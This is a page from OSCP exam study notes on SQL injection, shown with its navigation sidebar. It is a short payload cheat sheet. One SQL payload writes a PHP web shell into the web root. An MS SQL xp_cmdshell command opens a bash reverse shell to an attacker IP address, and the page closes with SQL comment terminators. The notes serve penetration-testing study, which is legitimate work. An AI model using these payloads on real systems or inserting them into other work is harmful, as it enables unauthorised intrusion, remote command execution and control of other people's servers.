💻
oscp-study-notes
  • What is this?
  • Scanning & Enumeration
    • FTP 21
    • SMTP 25
    • HTTP/HTTPS 80/443/*
    • SMB 139/443
  • Vulnerabilites & Exploitation
    • Socket Programming
    • Generate shellcodes
    • Shellshock
    • Cross Compiling
    • LFI/RFI
    • SQL Injection
    • CVE2009-3103
    • MS17-010
  • Privilege Escalation
  • File Transfers
  • Buffer Overflow
  • Port Redirection and Tunneling
  • Password Cracking
  • Proof
  • Netcat
  • Third-party Tools
  • Bypass AV
  • Methodology
  • Writing a report
  • Further Reading
Powered by GitBook
On this page
  • SQL reverse shells
  • If the target system is Windows and uses MS SQL
  • Comments

Was this helpful?

  1. Vulnerabilites & Exploitation

SQL Injection

SQL reverse shells

UNION SELECT '<?php system($_GET["cmd"]); ?>' FROM mytable INTO OUTFILE '/var/www/html/shell.php'

If the target system is Windows and uses MS SQL

EXEC xp_cmdshell '/bin/bash -i >& /dev/tcp/10.11.0.98/443 0>&1'

Comments

;#
;--
PreviousLFI/RFINextCVE2009-3103

Last updated 5 years ago

Was this helpful?